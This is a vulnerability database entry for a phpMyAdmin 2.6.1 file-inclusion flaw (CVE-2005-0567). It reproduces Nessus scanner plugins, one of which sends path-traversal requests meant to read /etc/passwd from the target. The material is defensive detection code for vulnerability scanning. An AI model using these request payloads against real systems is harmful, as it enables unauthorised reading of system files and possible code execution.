Vulnerabilities > CVE-2005-0567 - Unspecified vulnerability in PHPmyadmin 2.6.1
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN phpmyadmin
nessus
Summary
Multiple PHP remote file inclusion vulnerabilities in phpMyAdmin 2.6.1 allow remote attackers to execute arbitrary PHP code by modifying the (1) theme parameter to phpmyadmin.css.php or (2) cfg[Server][extension] parameter to database_interface.lib.php to reference a URL on a remote web server that contains the code.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Nessus
NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_882EF43B901F11D9A22C0001020EED82.NASL description A phpMyAdmin security announcement reports : We received two bug reports by Maksymilian Arciemowicz about those vulnerabilities and we wish to thank him for his work. The vulnerabilities apply to those points : - css/phpmyadmin.css.php was vulnerable against $cfg and GLOBALS variable injections. This way, a possible attacker could manipulate any configuration parameter. Using phpMyAdmin last seen 2020-06-01 modified 2020-06-02 plugin id 19016 published 2005-07-13 reporter This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/19016 title FreeBSD : phpmyadmin -- arbitrary file include and XSS vulnerabilities (882ef43b-901f-11d9-a22c-0001020eed82) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from the FreeBSD VuXML database : # # Copyright 2003-2018 Jacques Vidrine and contributors # # Redistribution and use in source (VuXML) and 'compiled' forms (SGML, # HTML, PDF, PostScript, RTF and so forth) with or without modification, # are permitted provided that the following conditions are met: # 1. Redistributions of source code (VuXML) must retain the above # copyright notice, this list of conditions and the following # disclaimer as the first lines of this file unmodified. # 2. Redistributions in compiled form (transformed to other DTDs, # published online in any format, converted to PDF, PostScript, # RTF and other formats) must reproduce the above copyright # notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # include("compat.inc"); if (description) { script_id(19016); script_version("1.20"); script_cvs_date("Date: 2019/08/02 13:32:37"); script_cve_id("CVE-2005-0543", "CVE-2005-0567"); script_bugtraq_id(12644, 12645); script_name(english:"FreeBSD : phpmyadmin -- arbitrary file include and XSS vulnerabilities (882ef43b-901f-11d9-a22c-0001020eed82)"); script_summary(english:"Checks for updated packages in pkg_info output"); script_set_attribute( attribute:"synopsis", value: "The remote FreeBSD host is missing one or more security-related updates." ); script_set_attribute( attribute:"description", value: "A phpMyAdmin security announcement reports : We received two bug reports by Maksymilian Arciemowicz about those vulnerabilities and we wish to thank him for his work. The vulnerabilities apply to those points : - css/phpmyadmin.css.php was vulnerable against $cfg and GLOBALS variable injections. This way, a possible attacker could manipulate any configuration parameter. Using phpMyAdmin's theming mechanism, he was able to include arbitrary files. This is especially dangerous if php is not running in safe mode. - A possible attacker could manipulate phpMyAdmin's localized strings via the URL and inject harmful JavaScript code this way, which could be used for XSS attacks." ); # http://marc.theaimsgroup.com/?l=bugtraq&m=110929725801154 script_set_attribute( attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110929725801154" ); # http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1 script_set_attribute( attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2005-1/" ); # https://vuxml.freebsd.org/freebsd/882ef43b-901f-11d9-a22c-0001020eed82.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?67495e86" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpMyAdmin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpmyadmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/21"); script_set_attribute(attribute:"patch_publication_date", value:"2005/03/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/13"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FreeBSD Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info"); exit(0); } include("audit.inc"); include("freebsd_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD"); if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (pkg_test(save_report:TRUE, pkg:"phpmyadmin>1.3.1<2.6.1.2")) flag++; if (pkg_test(save_report:TRUE, pkg:"phpMyAdmin>1.3.1<2.6.1.2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family CGI abuses NASL id PHPMYADMIN_REMOTE_FILE_INCLUDES.NASL description The installed version of phpMyAdmin suffers from multiple local file include flaws due to its failure to sanitize user input prior to its use in PHP last seen 2020-06-01 modified 2020-06-02 plugin id 17221 published 2005-02-25 reporter This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/17221 title phpMyAdmin < 2.6.1 pl1 Multiple Script File Inclusions code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(17221); script_version("1.21"); script_cvs_date("Date: 2018/11/15 20:50:18"); script_cve_id("CVE-2005-0567"); script_bugtraq_id(12645); script_name(english:"phpMyAdmin < 2.6.1 pl1 Multiple Script File Inclusions"); script_summary(english:"Detect multiple local file include vulnerabilities in phpMyAdmin"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP application that is prone to multiple local file include issues." ); script_set_attribute(attribute:"description", value: "The installed version of phpMyAdmin suffers from multiple local file include flaws due to its failure to sanitize user input prior to its use in PHP 'include' and 'require_once' calls. Specifically, a remote attacker can control values for the 'GLOBALS[cfg][ThemePath]' parameter used in 'css/phpmyadmin.css.php' as well as the 'cfg[Server][extension]' parameter use in 'libraries/database_interface.lib.php', which enables him to read arbitrary files on the remote host and possibly even run arbitrary code, subject to the privileges of the web server process." ); script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110929725801154&w=2" ); script_set_attribute(attribute:"see_also", value:"http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1" ); script_set_attribute(attribute:"solution", value: "Upgrade to phpMyAdmin 2.6.1 pl1 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/25"); script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/24"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin"); script_end_attributes(); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"CGI abuses"); script_dependencies("phpMyAdmin_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/phpMyAdmin", "www/PHP"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("data_protection.inc"); port = get_http_port(default:80, php:TRUE); # Try to grab /etc/passwd. exploits = make_list( "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00", "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00" # nb: skip this since it's a bit harder to grab /etc/passwd # "/libraries/database_interface.lib.php?cfg[Server][extension]=/etc/passwd" ); # Test an install. install = get_kb_item(string("www/", port, "/phpMyAdmin")); if (isnull(install)) exit(0); matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$"); if (!isnull(matches)) { dir = matches[2]; # Try to grab /etc/passwd. foreach exploit (exploits) { r = http_send_recv3(method:"GET",item:string(dir, exploit), port:port, exit_on_fail:TRUE); res = r[2]; # It's a problem if there's an entry for root. if (egrep(pattern:"root:.*:0:[01]:", string:res)) { if (report_verbosity) { res = data_protection::redact_etc_passwd(output:res); report = string( "\n", "Here are the contents of the file '/etc/passwd' that Nessus\n", "was able to read from the remote host :\n", "\n", res ); security_warning(port:port, extra:report); } else security_warning(port); exit(0); } # We're finished unless the "Perform thorough tests" setting is enabled. if (!thorough_tests) break; } }
References
- http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1
- http://sourceforge.net/tracker/index.php?func=detail&aid=1149381&group_id=23067&atid=377408
- http://www.securityfocus.com/bid/12645
- http://secunia.com/advisories/14382/
- http://marc.info/?l=bugtraq&m=110929725801154&w=2
- https://exchange.xforce.ibmcloud.com/vulnerabilities/19465